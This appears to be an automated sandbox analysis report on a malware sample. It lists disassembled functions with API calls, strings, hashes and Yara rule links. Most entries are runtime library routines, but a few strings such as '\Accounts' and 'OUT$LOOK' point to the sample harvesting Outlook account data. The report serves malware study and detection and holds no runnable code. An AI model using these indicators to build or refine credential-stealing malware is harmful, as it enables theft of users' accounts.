                                                          • Opcode Fuzzy Hash: 9818ba29eeceff1be690a684500116c960833161fd111d66c594bdf9318a9f9f
                                                          • Instruction Fuzzy Hash: 2C210875A10209EFEF14DFA9D884EADB7B9EF48745B10806DF506E7260DBB09E44CB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0027872F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog2.LIBCMT ref: 00278736
                                                            • Part of subcall function 0027842C: __EH_prolog.LIBCMT ref: 00278431
                                                            • Part of subcall function 002B2DA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,00488A38,?,002AE60B,00000000,004851C0,?), ref: 002B2E03
                                                          • __EH_prolog.LIBCMT ref: 0027878D
                                                          • std::system_error::system_error.LIBCPMT ref: 0027879F
                                                            • Part of subcall function 002776FB: std::exception::exception.LIBCMT ref: 00277706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionH_prolog2Raisestd::exception::exceptionstd::system_error::system_error
                                                          • String ID: ryF$yF
                                                          • API String ID: 705891348-1945384894
                                                          • Opcode ID: ce641835de00dc260e1306f176cc3e89bc3d59017056657839ad902ef6129afc
                                                          • Instruction ID: f075d30eb84a9a28a3018482613ed603a143adbe226319d1f165e468de3d9da2
                                                          • Opcode Fuzzy Hash: ce641835de00dc260e1306f176cc3e89bc3d59017056657839ad902ef6129afc
                                                          • Instruction Fuzzy Hash: 86213175811208AFCB04DF64C981ADEBBB8FF15304F6085AFE50597642DB74EA19CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028D564, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5BF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5CF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D5DF
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D602
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0028D5A3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::bad_exception::bad_exception
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2160870905-4142698353
                                                          • Opcode ID: 5a9e1967b9aa77ea703e693fe17e049addac316feb22ec471b5dbb60f1dbc9fe
                                                          • Instruction ID: 203f8a8276111bd02a27ae93272dcfb41d0e82020696e2a11bed8e040aa3bcec
                                                          • Opcode Fuzzy Hash: 5a9e1967b9aa77ea703e693fe17e049addac316feb22ec471b5dbb60f1dbc9fe
                                                          • Instruction Fuzzy Hash: A211597947230566CB1ABF78CC0AEEF3769AB05308B70850BF011354C695AD993DCB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028D63C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D697
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6A7
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6B7
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0028D6DA
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 0028D67B
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::bad_exception::bad_exception
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          • API String ID: 2160870905-4142698353
                                                          • Opcode ID: f6ffb8c1c9c73329b589a443460b871c8453f9942d2d3e0e6536e360e29bc126
                                                          • Instruction ID: 122842f49362cc97076785b2ceba687e64e57a85cc2ecc852bdba7b52bf57a7a
                                                          • Opcode Fuzzy Hash: f6ffb8c1c9c73329b589a443460b871c8453f9942d2d3e0e6536e360e29bc126
                                                          • Instruction Fuzzy Hash: 25115C3957231967CB19BF74EC4AEEE37286B01304F308506F015254C5A5A9A43DCB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044667F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 00446694
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 004466A7
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00446674,?,?,0044663C,00000000,00000000,?), ref: 004466CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 9b7408058c94a55f6d1424f76b21aa8e9db363957f9cf57c946febcb889bf531
                                                          • Instruction ID: d4827812c01c97a2850f24f69cf60125d39f83ccc5a0a6c213edd706198de3a6
                                                          • Opcode Fuzzy Hash: 9b7408058c94a55f6d1424f76b21aa8e9db363957f9cf57c946febcb889bf531
                                                          • Instruction Fuzzy Hash: 48F0A730501118FBEB119F90EC09BEEBA75EF01755F114061F805A2160DBB88E00DF9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CEF36, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 597776487-0
                                                          • Opcode ID: 3b2bf95787a6e30b203f5d633d3261a63db0120a8de833f97b9ecd8adfcac424
                                                          • Instruction ID: ac859de2c393b4d6944eaebf7dcbe0db80b8ef1b8bdc363728bc3413991a85ba
                                                          • Opcode Fuzzy Hash: 3b2bf95787a6e30b203f5d633d3261a63db0120a8de833f97b9ecd8adfcac424
                                                          • Instruction Fuzzy Hash: A4C169719202469FDB209F78DD82FAE7BBAAF41310F1446BEE454D7282E7709E21CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002794E0, Relevance: 7.8, APIs: 5, Instructions: 271memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002794E5
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 002795FD
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00279604
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00279793
                                                          • HeapFree.KERNEL32(00000000), ref: 0027979A
                                                            • Part of subcall function 00278FBC: __EH_prolog.LIBCMT ref: 00278FC1
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Heap$FreeH_prologProcess$Deallocate
                                                          • String ID:
                                                          • API String ID: 4229974167-0
                                                          • Opcode ID: 0dd14700a7dffc3df4066683b1509795ba9b22ba6ebc4b334bd3fc73dd777a79
                                                          • Instruction ID: 8813744ecc55e65c55d57de5a525ebdb45299ade519d01dddab537060c7e77e9
                                                          • Opcode Fuzzy Hash: 0dd14700a7dffc3df4066683b1509795ba9b22ba6ebc4b334bd3fc73dd777a79
                                                          • Instruction Fuzzy Hash: FFB15931D24259DFCF05EFE4C991AEDBBB4AF18300F608169E40977241EB746A58DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AF37D, Relevance: 7.7, APIs: 5, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,002AED9E,?,00000100,?), ref: 002AF3C5
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,?,00000000,00000000,?,002AED9E,?,00000100,?,00000001,?,00000003,?,00000001), ref: 002AF435
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,?,?,?,?,?,00000003,?), ref: 002AF50B
                                                          • __freea.LIBCMT ref: 002AF514
                                                          • __freea.LIBCMT ref: 002AF51F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__freea
                                                          • String ID:
                                                          • API String ID: 2689816821-0
                                                          • Opcode ID: 375eb67d7a54f0ca50b2dc92e2d2df4d8346571b7b52a71c30938a48aac09282
                                                          • Instruction ID: 95c0fc8b204a732c27ccd19d26d11ac36baa172b832e45237222c8d765555b9b
                                                          • Opcode Fuzzy Hash: 375eb67d7a54f0ca50b2dc92e2d2df4d8346571b7b52a71c30938a48aac09282
                                                          • Instruction Fuzzy Hash: BE510272920206ABDF606FE4DE45EAB7BA9EB46750F140039FE04D6150EF79DC308BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ACDBD, Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 002ACE05
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 002ACE36
                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,002ACD9C,00000000,00000000), ref: 002ACE65
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002ACD9C), ref: 002ACE73
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002ACEA5
                                                            • Part of subcall function 002AC965: GetFileInformationByHandle.KERNEL32(?,?), ref: 002AC979
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 89576305-0
                                                          • Opcode ID: c4014a07f8c033faed50acf0ef0f4655be9c9bdf2d030fe9e0c612f797183491
                                                          • Instruction ID: 32caf184c2ba445146e54a8246c1bfbb191dedeb2b7cef843975531ae0d5523c
                                                          • Opcode Fuzzy Hash: c4014a07f8c033faed50acf0ef0f4655be9c9bdf2d030fe9e0c612f797183491
                                                          • Instruction Fuzzy Hash: 58319271510B49AFDB25CF69C884AABBBE8FF09314F10492EF596C2650EB70A944CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043CB6D, Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 0043CBB5
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 0043CBE6
                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0043CB4C,00000000,00000000), ref: 0043CC15
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043CB4C), ref: 0043CC23
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043CC55
                                                            • Part of subcall function 0043C715: GetFileInformationByHandle.KERNEL32(?,?), ref: 0043C729
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 89576305-0
                                                          • Opcode ID: c4014a07f8c033faed50acf0ef0f4655be9c9bdf2d030fe9e0c612f797183491
                                                          • Instruction ID: 646d2b5c0dcc19b6cd390359bac961f7e7c2850b782350c6e703fff025803152
                                                          • Opcode Fuzzy Hash: c4014a07f8c033faed50acf0ef0f4655be9c9bdf2d030fe9e0c612f797183491
                                                          • Instruction Fuzzy Hash: 9F318EB2900B08AFD724DF79D881AABBBE8FB08304F00492EE596D2750E774E904CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D0E19, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 002D0E31
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D0E43
                                                          • _free.LIBCMT ref: 002D0E55
                                                          • _free.LIBCMT ref: 002D0E67
                                                          • _free.LIBCMT ref: 002D0E79
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: b0bf25a9d39e93fa547240c5596a6c1f50777394f4a1661d28a2a98de8a7f085
                                                          • Instruction ID: 2d09ac891fbfca5a2c93288cae0e759aa18a56611af2d1f74de238c9fe652ef9
                                                          • Opcode Fuzzy Hash: b0bf25a9d39e93fa547240c5596a6c1f50777394f4a1661d28a2a98de8a7f085
                                                          • Instruction Fuzzy Hash: 05F04F32528612AB8660EF58E9C5E5A73DAAB00750B980C1EF068D7620CF30FD908F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00460BC9, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00460BE1
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 00460BF3
                                                          • _free.LIBCMT ref: 00460C05
                                                          • _free.LIBCMT ref: 00460C17
                                                          • _free.LIBCMT ref: 00460C29
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: b0bf25a9d39e93fa547240c5596a6c1f50777394f4a1661d28a2a98de8a7f085
                                                          • Instruction ID: c08c4e804858385e581ee740cd34384e2b356d3e5397b58f41c775e5ea04b8c8
                                                          • Opcode Fuzzy Hash: b0bf25a9d39e93fa547240c5596a6c1f50777394f4a1661d28a2a98de8a7f085
                                                          • Instruction Fuzzy Hash: BEF04432548110ABC524EB59F985C1FB7DAAB007147941C2EF454D7A02DE39FE81479C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028D7BA, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028D7BF
                                                            • Part of subcall function 002859A9: __EH_prolog.LIBCMT ref: 002859AE
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate
                                                          • String ID: ; expected $unexpected $while parsing
                                                          • API String ID: 2428181759-3160839188
                                                          • Opcode ID: 134acae73445cf114c31a65c0e6a4103c8b9910147cf84bd3fef2173514d357c
                                                          • Instruction ID: 857afe712e8689cdac0972221ae4cef7bf1852a88faf27a59d0787e363c882d9
                                                          • Opcode Fuzzy Hash: 134acae73445cf114c31a65c0e6a4103c8b9910147cf84bd3fef2173514d357c
                                                          • Instruction Fuzzy Hash: D8613A71D10149DBDB54EFA8C592BEDB7B5AF18300F50C1AEE459B3282DB781A18CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00452026, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • _free.LIBCMT ref: 004520D5
                                                          • _free.LIBCMT ref: 00452103
                                                          • _free.LIBCMT ref: 0045214B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorLast
                                                          • String ID: ["E
                                                          • API String ID: 3291180501-1051519868
                                                          • Opcode ID: 75bf17c88e237772d792eea1fda9653768e97c97a4eeae11d589f68c92deb722
                                                          • Instruction ID: 760e4bc2c47b19a9a5891eddc6f32a1b5c64f5330059fd51f27f76506e7cc3dd
                                                          • Opcode Fuzzy Hash: 75bf17c88e237772d792eea1fda9653768e97c97a4eeae11d589f68c92deb722
                                                          • Instruction Fuzzy Hash: F941BF31600506AFD724DFACC981A6AB3F5EF4A315B24056FE905C7392DB75EC18CB48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B2E70, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 002B2EAF
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 002B2F63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: @$csm
                                                          • API String ID: 3480331319-2398961668
                                                          • Opcode ID: b4f75948e9bb98ffe4c0bb2332fc0a7c5fa8eaf632c3df882042a2f655944b66
                                                          • Instruction ID: e23c902cc7f965cd1c443a50cd7844271716c4b7b54f8c4261d50a3fb4295f8b
                                                          • Opcode Fuzzy Hash: b4f75948e9bb98ffe4c0bb2332fc0a7c5fa8eaf632c3df882042a2f655944b66
                                                          • Instruction Fuzzy Hash: 1B41D334E20309DBCF10DF68C880AEEBBB5AF45364F148155E8185B392D771EA69CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B378E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEncodePointer.NTDLL(00000000), ref: 002B37B3
                                                          • CatchIt.LIBVCRUNTIME ref: 002B3899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CatchEncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1435073870-2084237596
                                                          • Opcode ID: bfea69136afe12f47c961ba4c5f00952b3392747476c7529f89f3809765ba492
                                                          • Instruction ID: 6e7371fcd9a4f9038365edcb921061e97051b516e4f39410b41ed8eb0f331e3e
                                                          • Opcode Fuzzy Hash: bfea69136afe12f47c961ba4c5f00952b3392747476c7529f89f3809765ba492
                                                          • Instruction Fuzzy Hash: 2B417B7190020AEFCF16DF98C981AEEBBB5FF48340F1441A9F914A7211D735AA60DF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00277E43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00277E48
                                                          • ___std_fs_convert_narrow_to_wide@20.LIBCPMT ref: 00277E8D
                                                            • Part of subcall function 002ADC68: MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,00000000,?,?,?,00277E92,?,?,?,00000000,00000000), ref: 002ADC7D
                                                            • Part of subcall function 002ADC68: GetLastError.KERNEL32(?,?,00277E92,?,?,?,00000000,00000000), ref: 002ADC89
                                                          • ___std_fs_convert_narrow_to_wide@20.LIBCPMT ref: 00277EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_fs_convert_narrow_to_wide@20$ByteCharErrorH_prologLastMultiWide
                                                          • String ID: JyF
                                                          • API String ID: 3840427001-3809408798
                                                          • Opcode ID: 49d544cba3c040066ac267dcf35da85fca55d4c2376fd6bf38b1795cad84ba77
                                                          • Instruction ID: 929c3e6fe2d102822fec89be337c23b4573e3b910171e70914cf6788c7829941
                                                          • Opcode Fuzzy Hash: 49d544cba3c040066ac267dcf35da85fca55d4c2376fd6bf38b1795cad84ba77
                                                          • Instruction Fuzzy Hash: 7B11E975A14205ABDB145F68C841A6FB6FEEF84714F10C96EF419D3740EBB4CD108BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002ADB54, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002ADB1C: GetModuleHandleW.KERNEL32(00488014,00000000,?,002AE1F4,0048BEAC,0046C914,0046C930,0043D999,00000003,?,00000080,0046A7AD,00488014,?,00000003), ref: 002ADB2C
                                                            • Part of subcall function 002ADB1C: GetProcAddress.KERNEL32(00000000,0046A7AD,?,002AE1F4,0048BEAC,0046C914,0046C930,0043D999,00000003,?,00000080,0046A7AD,00488014,?,00000003), ref: 002ADB3A
                                                          • GetLastError.KERNEL32 ref: 002ADBAE
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 002ADBBE
                                                          • GetLastError.KERNEL32 ref: 002ADBD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorHandleLast$AddressFileInformationModuleProc
                                                          • String ID: @
                                                          • API String ID: 1948868563-1615503679
                                                          • Opcode ID: 69abe90d8fa0b8554d1bac7244ab68cd744541ef96391f0f001d19ecea81f551
                                                          • Instruction ID: 55c61763561c860fd7b41bd41d27418432e57f60e6a3092cc57b3e905d3fb213
                                                          • Opcode Fuzzy Hash: 69abe90d8fa0b8554d1bac7244ab68cd744541ef96391f0f001d19ecea81f551
                                                          • Instruction Fuzzy Hash: 50118EB5A10209EFC700EFA4DC85AAEB7F8EF09714B214426F946E7650EB7098148BB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004204CF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • m_object != nullptr, xrefs: 004204F7
                                                          • cannot compare iterators of different containers, xrefs: 0042053C
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 004204F2
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$cannot compare iterators of different containers$m_object != nullptr
                                                          • API String ID: 3519838083-2131441591
                                                          • Opcode ID: e9ad5f369ee389ecf4990787c2bc6a6c85ae6eb129bb403592a1af4b4b43eac9
                                                          • Instruction ID: 93a07ce67fe1c5efba471824342d0f05c4e46ff6085492b605373c1e97822133
                                                          • Opcode Fuzzy Hash: e9ad5f369ee389ecf4990787c2bc6a6c85ae6eb129bb403592a1af4b4b43eac9
                                                          • Instruction Fuzzy Hash: CE115A31A00254AFC710DF5AE985A9AB7F8EF10314FA0881BE456E3641D778FE81CA59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043428E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00434293
                                                            • Part of subcall function 00434150: lstrlenW.KERNEL32(00000000), ref: 004341B2
                                                            • Part of subcall function 00434150: lstrcpyW.KERNEL32(00000000,00000000), ref: 004341CA
                                                            • Part of subcall function 00434150: lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004341D6
                                                          • _strlen.LIBCMT ref: 004342A7
                                                            • Part of subcall function 0040DA55: __EH_prolog.LIBCMT ref: 0040DA5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prologlstrcpy$_strlenlstrlen
                                                          • String ID: OUT$LOOK
                                                          • API String ID: 27009005-2048763347
                                                          • Opcode ID: 8f3c517a012fcec478cc40fd2a1be9078fef8455046a4a3115a2d3a608377f51
                                                          • Instruction ID: bc0b4489adfd6addbaf52cea890d95892af78c2b783e506e37030954df7ae07b
                                                          • Opcode Fuzzy Hash: 8f3c517a012fcec478cc40fd2a1be9078fef8455046a4a3115a2d3a608377f51
                                                          • Instruction Fuzzy Hash: 57110670D00119CAEB15EBA9EC51AEFB7749F45304F1091BEE01A73291DE386A48CFA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00277D35, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::system_error::system_error.LIBCPMT ref: 00277DA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: std::system_error::system_error
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2416138045-1866435925
                                                          • Opcode ID: bb48450e3289d3874b7bcee70fd47eb14997961581191e0e3ff2c2ee173db773
                                                          • Instruction ID: 143b8d380c48bb04beb3d800d13cec60f8a864fcb0910c9638f12cd95765242f
                                                          • Opcode Fuzzy Hash: bb48450e3289d3874b7bcee70fd47eb14997961581191e0e3ff2c2ee173db773
                                                          • Instruction Fuzzy Hash: EC01F77291431A6BDB20AA58CC02BFA7798DF05350F14C42AFE4D9A182E7799D21CFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B68CF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,004705F4,00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B68E4
                                                          • GetProcAddress.KERNEL32(00000000,0047060C,00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B68F7
                                                          • FreeLibrary.KERNEL32(00000000,?,?,002B68C4,?,?,002B688C,00000000,00000000,?), ref: 002B691A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: @
                                                          • API String ID: 4061214504-1615503679
                                                          • Opcode ID: 9b7408058c94a55f6d1424f76b21aa8e9db363957f9cf57c946febcb889bf531
                                                          • Instruction ID: 3a3036bee1d0d70b99ebb29342bf0f96e1bc3bff33f24892469ecb1ee7c5e689
                                                          • Opcode Fuzzy Hash: 9b7408058c94a55f6d1424f76b21aa8e9db363957f9cf57c946febcb889bf531
                                                          • Instruction Fuzzy Hash: 69F08230511519FBEB119F90DC0DBED7A65EB00755F204061E805A2160DBB98F10DA99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CB2B7, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          • Opcode ID: 23c3742646c604ffa098561bd5fed471053c739b9a8a755a54060249d9b07da3
